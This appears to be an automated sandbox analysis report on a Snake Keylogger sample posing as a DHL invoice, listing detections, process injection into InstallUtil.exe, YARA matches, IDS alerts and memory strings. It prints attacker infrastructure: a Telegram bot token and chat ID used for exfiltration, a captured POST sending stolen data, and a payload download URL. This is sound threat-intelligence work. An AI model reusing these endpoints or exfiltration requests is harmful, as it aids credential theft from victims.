Edit tour

Windows Analysis Report
Invoice DHL - AWB 2024 E4001 - 0000731.exe

Overview

General Information

Sample name:	Invoice DHL - AWB 2024 E4001 - 0000731.exe
Analysis ID:	1578744
MD5:	1147fdf9a4f5f4dcdbdd6c080c88e083
SHA1:	753e81bcdb1750a4cc0d34093fe2cd5f5512d77a
SHA256:	4ec5b3be5d6a5039ec5c725a8da4290f6faf51e744c4b6441c9e625dbe7cc88e
Tags:	exeuser-julianmckein
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

.NET source code contains potential unpacker

AI detected suspicious sample

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for sample

Sample has a suspicious name (potential lure to open the executable)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Process Tree

System is w10x64

Invoice DHL - AWB 2024 E4001 - 0000731.exe (PID: 6672 cmdline: "C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe" MD5: 1147FDF9A4F5F4DCDBDD6C080C88E083)

InstallUtil.exe (PID: 1432 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendMessage?chat_id=6287380231", "Token": "8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8", "Chat_id": "6287380231", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x142b9:$a1: get_encryptedPassword 0x1459d:$a2: get_encryptedUsername 0x140c5:$a3: get_timePasswordChanged 0x141c0:$a4: get_passwordField 0x142cf:$a5: set_encryptedPassword 0x1590f:$a7: get_logins 0x15872:$a10: KeyLoggerEventArgs 0x154dd:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1935c:$x1: $%SMTPDV$ 0x17c3c:$x2: $#TheHashHere%& 0x19304:$x3: %FTPDV$ 0x17bdc:$x4: $%TelegramDv$ 0x154dd:$x5: KeyLoggerEventArgs 0x15872:$x5: KeyLoggerEventArgs 0x19328:$m2: Clipboard Logs ID 0x19566:$m2: Screenshot Logs ID 0x19676:$m2: keystroke Logs ID 0x19950:$m3: SnakePW 0x1953e:$m4: \SnakeKeylogger\
00000000.00000002.2050649719.0000000005E70000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.2940130567.00000000025D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.2940130567.0000000002659000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2036269794.0000000002409000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x63489:$a1: get_encryptedPassword 0x834a9:$a1: get_encryptedPassword 0x6376d:$a2: get_encryptedUsername 0x8378d:$a2: get_encryptedUsername 0x63295:$a3: get_timePasswordChanged 0x832b5:$a3: get_timePasswordChanged 0x63390:$a4: get_passwordField 0x833b0:$a4: get_passwordField 0x6349f:$a5: set_encryptedPassword 0x834bf:$a5: set_encryptedPassword 0x64adf:$a7: get_logins 0x84aff:$a7: get_logins 0x64a42:$a10: KeyLoggerEventArgs 0x84a62:$a10: KeyLoggerEventArgs 0x646ad:$a11: KeyLoggerEventArgsEventHandler 0x846cd:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x6852c:$x1: $%SMTPDV$ 0x8854c:$x1: $%SMTPDV$ 0x66e0c:$x2: $#TheHashHere%& 0x86e2c:$x2: $#TheHashHere%& 0x684d4:$x3: %FTPDV$ 0x884f4:$x3: %FTPDV$ 0x66dac:$x4: $%TelegramDv$ 0x86dcc:$x4: $%TelegramDv$ 0x646ad:$x5: KeyLoggerEventArgs 0x64a42:$x5: KeyLoggerEventArgs 0x846cd:$x5: KeyLoggerEventArgs 0x84a62:$x5: KeyLoggerEventArgs 0x684f8:$m2: Clipboard Logs ID 0x68736:$m2: Screenshot Logs ID 0x68846:$m2: keystroke Logs ID 0x88518:$m2: Clipboard Logs ID 0x88756:$m2: Screenshot Logs ID 0x88866:$m2: keystroke Logs ID 0x68b20:$m3: SnakePW 0x88b40:$m3: SnakePW 0x6870e:$m4: \SnakeKeylogger\
00000004.00000002.2940130567.0000000002411000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Invoice DHL - AWB 2024 E4001 - 0000731.exe PID: 6672	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Invoice DHL - AWB 2024 E4001 - 0000731.exe PID: 6672	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Invoice DHL - AWB 2024 E4001 - 0000731.exe PID: 6672	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Invoice DHL - AWB 2024 E4001 - 0000731.exe PID: 6672	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x115d43:$a1: get_encryptedPassword 0x115f12:$a2: get_encryptedUsername 0x115b6c:$a3: get_timePasswordChanged 0x115c5b:$a4: get_passwordField 0x115d59:$a5: set_encryptedPassword 0x117b79:$a7: get_logins 0x117ae6:$a10: KeyLoggerEventArgs 0x11780f:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Invoice DHL - AWB 2024 E4001 - 0000731.exe PID: 6672	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x11780f:$x5: KeyLoggerEventArgs 0x117ae6:$x5: KeyLoggerEventArgs 0x118277:$x5: KeyLoggerEventArgs 0x1185d8:$x5: KeyLoggerEventArgs 0x119b81:$m2: Clipboard Logs ID 0x119c87:$m2: Screenshot Logs ID 0x119cdd:$m2: keystroke Logs ID 0x119e12:$m3: SnakePW 0x119c73:$m4: \SnakeKeylogger\
Process Memory Space: InstallUtil.exe PID: 1432	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: InstallUtil.exe PID: 1432	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: InstallUtil.exe PID: 1432	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c7ed:$a1: get_encryptedPassword 0x1cac7:$a2: get_encryptedUsername 0x1c603:$a3: get_timePasswordChanged 0x1c6fe:$a4: get_passwordField 0x1c803:$a5: set_encryptedPassword 0x1ecf0:$a7: get_logins 0x1ec53:$a10: KeyLoggerEventArgs 0x1e8be:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: InstallUtil.exe PID: 1432	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1e8be:$x5: KeyLoggerEventArgs 0x1ec53:$x5: KeyLoggerEventArgs 0x1f55a:$x5: KeyLoggerEventArgs 0x1f8bb:$x5: KeyLoggerEventArgs 0x20f04:$m2: Clipboard Logs ID 0x2100a:$m2: Screenshot Logs ID 0x21060:$m2: keystroke Logs ID 0x2404:$m3: SnakePW 0x2607:$m3: SnakePW 0x2816:$m3: SnakePW 0x3804:$m3: SnakePW 0x12479:$m3: SnakePW 0x128c5:$m3: SnakePW 0x12b91:$m3: SnakePW 0x21195:$m3: SnakePW 0x2a165:$m3: SnakePW 0x20ff6:$m4: \SnakeKeylogger\
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5e70000.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
4.2.InstallUtil.exe.420000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.InstallUtil.exe.420000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2.InstallUtil.exe.420000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x144b9:$a1: get_encryptedPassword 0x1479d:$a2: get_encryptedUsername 0x142c5:$a3: get_timePasswordChanged 0x143c0:$a4: get_passwordField 0x144cf:$a5: set_encryptedPassword 0x15b0f:$a7: get_logins 0x15a72:$a10: KeyLoggerEventArgs 0x156dd:$a11: KeyLoggerEventArgsEventHandler
4.2.InstallUtil.exe.420000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1bf4a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b17c:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b5af:$a4: \Orbitum\User Data\Default\Login Data 0x1c5ee:$a5: \Kometa\User Data\Default\Login Data
4.2.InstallUtil.exe.420000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15076:$s1: UnHook 0x1507d:$s2: SetHook 0x15085:$s3: CallNextHook 0x15092:$s4: _hook
4.2.InstallUtil.exe.420000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1955c:$x1: $%SMTPDV$ 0x17e3c:$x2: $#TheHashHere%& 0x19504:$x3: %FTPDV$ 0x17ddc:$x4: $%TelegramDv$ 0x156dd:$x5: KeyLoggerEventArgs 0x15a72:$x5: KeyLoggerEventArgs 0x19528:$m2: Clipboard Logs ID 0x19766:$m2: Screenshot Logs ID 0x19876:$m2: keystroke Logs ID 0x19b50:$m3: SnakePW 0x1973e:$m4: \SnakeKeylogger\
0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x126b9:$a1: get_encryptedPassword 0x1299d:$a2: get_encryptedUsername 0x124c5:$a3: get_timePasswordChanged 0x125c0:$a4: get_passwordField 0x126cf:$a5: set_encryptedPassword 0x13d0f:$a7: get_logins 0x13c72:$a10: KeyLoggerEventArgs 0x138dd:$a11: KeyLoggerEventArgsEventHandler
0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a14a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1937c:$a3: \Google\Chrome\User Data\Default\Login Data 0x197af:$a4: \Orbitum\User Data\Default\Login Data 0x1a7ee:$a5: \Kometa\User Data\Default\Login Data
0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13276:$s1: UnHook 0x1327d:$s2: SetHook 0x13285:$s3: CallNextHook 0x13292:$s4: _hook
0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1775c:$x1: $%SMTPDV$ 0x1603c:$x2: $#TheHashHere%& 0x17704:$x3: %FTPDV$ 0x15fdc:$x4: $%TelegramDv$ 0x138dd:$x5: KeyLoggerEventArgs 0x13c72:$x5: KeyLoggerEventArgs 0x17728:$m2: Clipboard Logs ID 0x17966:$m2: Screenshot Logs ID 0x17a76:$m2: keystroke Logs ID 0x17d50:$m3: SnakePW 0x1793e:$m4: \SnakeKeylogger\
0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x144b9:$a1: get_encryptedPassword 0x344d9:$a1: get_encryptedPassword 0x1479d:$a2: get_encryptedUsername 0x347bd:$a2: get_encryptedUsername 0x142c5:$a3: get_timePasswordChanged 0x342e5:$a3: get_timePasswordChanged 0x143c0:$a4: get_passwordField 0x343e0:$a4: get_passwordField 0x144cf:$a5: set_encryptedPassword 0x344ef:$a5: set_encryptedPassword 0x15b0f:$a7: get_logins 0x35b2f:$a7: get_logins 0x15a72:$a10: KeyLoggerEventArgs 0x35a92:$a10: KeyLoggerEventArgs 0x156dd:$a11: KeyLoggerEventArgsEventHandler 0x356fd:$a11: KeyLoggerEventArgsEventHandler
0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1bf4a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3bf6a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b17c:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b19c:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b5af:$a4: \Orbitum\User Data\Default\Login Data 0x3b5cf:$a4: \Orbitum\User Data\Default\Login Data 0x1c5ee:$a5: \Kometa\User Data\Default\Login Data 0x3c60e:$a5: \Kometa\User Data\Default\Login Data
0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15076:$s1: UnHook 0x35096:$s1: UnHook 0x1507d:$s2: SetHook 0x3509d:$s2: SetHook 0x15085:$s3: CallNextHook 0x350a5:$s3: CallNextHook 0x15092:$s4: _hook 0x350b2:$s4: _hook
0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1955c:$x1: $%SMTPDV$ 0x3957c:$x1: $%SMTPDV$ 0x17e3c:$x2: $#TheHashHere%& 0x37e5c:$x2: $#TheHashHere%& 0x19504:$x3: %FTPDV$ 0x39524:$x3: %FTPDV$ 0x17ddc:$x4: $%TelegramDv$ 0x37dfc:$x4: $%TelegramDv$ 0x156dd:$x5: KeyLoggerEventArgs 0x15a72:$x5: KeyLoggerEventArgs 0x356fd:$x5: KeyLoggerEventArgs 0x35a92:$x5: KeyLoggerEventArgs 0x19528:$m2: Clipboard Logs ID 0x19766:$m2: Screenshot Logs ID 0x19876:$m2: keystroke Logs ID 0x39548:$m2: Clipboard Logs ID 0x39786:$m2: Screenshot Logs ID 0x39896:$m2: keystroke Logs ID 0x19b50:$m3: SnakePW 0x39b70:$m3: SnakePW 0x1973e:$m4: \SnakeKeylogger\
0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x62cd9:$a1: get_encryptedPassword 0x82cf9:$a1: get_encryptedPassword 0x62fbd:$a2: get_encryptedUsername 0x82fdd:$a2: get_encryptedUsername 0x62ae5:$a3: get_timePasswordChanged 0x82b05:$a3: get_timePasswordChanged 0x62be0:$a4: get_passwordField 0x82c00:$a4: get_passwordField 0x62cef:$a5: set_encryptedPassword 0x82d0f:$a5: set_encryptedPassword 0x6432f:$a7: get_logins 0x8434f:$a7: get_logins 0x64292:$a10: KeyLoggerEventArgs 0x842b2:$a10: KeyLoggerEventArgs 0x63efd:$a11: KeyLoggerEventArgsEventHandler 0x83f1d:$a11: KeyLoggerEventArgsEventHandler
0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x6a76a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x8a78a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x6999c:$a3: \Google\Chrome\User Data\Default\Login Data 0x899bc:$a3: \Google\Chrome\User Data\Default\Login Data 0x69dcf:$a4: \Orbitum\User Data\Default\Login Data 0x89def:$a4: \Orbitum\User Data\Default\Login Data 0x6ae0e:$a5: \Kometa\User Data\Default\Login Data 0x8ae2e:$a5: \Kometa\User Data\Default\Login Data
0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x63896:$s1: UnHook 0x838b6:$s1: UnHook 0x6389d:$s2: SetHook 0x838bd:$s2: SetHook 0x638a5:$s3: CallNextHook 0x838c5:$s3: CallNextHook 0x638b2:$s4: _hook 0x838d2:$s4: _hook
0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x67d7c:$x1: $%SMTPDV$ 0x87d9c:$x1: $%SMTPDV$ 0x6665c:$x2: $#TheHashHere%& 0x8667c:$x2: $#TheHashHere%& 0x67d24:$x3: %FTPDV$ 0x87d44:$x3: %FTPDV$ 0x665fc:$x4: $%TelegramDv$ 0x8661c:$x4: $%TelegramDv$ 0x63efd:$x5: KeyLoggerEventArgs 0x64292:$x5: KeyLoggerEventArgs 0x83f1d:$x5: KeyLoggerEventArgs 0x842b2:$x5: KeyLoggerEventArgs 0x67d48:$m2: Clipboard Logs ID 0x67f86:$m2: Screenshot Logs ID 0x68096:$m2: keystroke Logs ID 0x87d68:$m2: Clipboard Logs ID 0x87fa6:$m2: Screenshot Logs ID 0x880b6:$m2: keystroke Logs ID 0x68370:$m3: SnakePW 0x88390:$m3: SnakePW 0x67f5e:$m4: \SnakeKeylogger\
Click to see the 19 entries

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T10:22:42.787363+0100	2803305	3	Unknown Traffic	192.168.2.4	49739	104.21.67.152	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T10:22:38.842172+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49737	132.226.247.73	80	TCP
2024-12-20T10:22:41.170332+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49737	132.226.247.73	80	TCP
2024-12-20T10:22:44.264063+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49740	132.226.247.73	80	TCP

ETPRO MALWARE Snake Keylogger Telegram Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T10:23:09.381203+0100	2853006	1	A Network Trojan was detected	192.168.2.4	49769	149.154.167.220	443	TCP

HTTP traffic detected: POST /bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendDocument?chat_id=6287380231&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21e85383b951Host: api.telegram.orgContent-Length: 569Connection: Keep-Alive

Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2036269794.0000000002381000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://160.22.121.182
Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2036269794.0000000002381000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://160.22.121.182/STATO/Vskhdvzxu.mp3
Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe	String found in binary or memory: http://160.22.121.182/STATO/Vskhdvzxu.mp310zmhb41piE2K/FJ1XdBqJA==
Source: InstallUtil.exe, 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: InstallUtil.exe, 00000004.00000002.2940130567.0000000002587000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000024CA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000255E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000025B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002579000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000256B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: InstallUtil.exe, 00000004.00000002.2940130567.0000000002594000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002587000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000024CA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000255E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000025B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002411000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002579000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000250D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000256B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: InstallUtil.exe, 00000004.00000002.2940130567.0000000002411000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: InstallUtil.exe, 00000004.00000002.2940130567.0000000002587000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000255E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000025B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002579000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000024E3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000256B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2036269794.0000000002381000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002411000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: InstallUtil.exe, 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: InstallUtil.exe, 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: InstallUtil.exe, 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendDocument?chat_id=6287
Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: InstallUtil.exe, 00000004.00000002.2940130567.0000000002587000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000024CA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000255E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000025B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002579000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000250D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000256B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
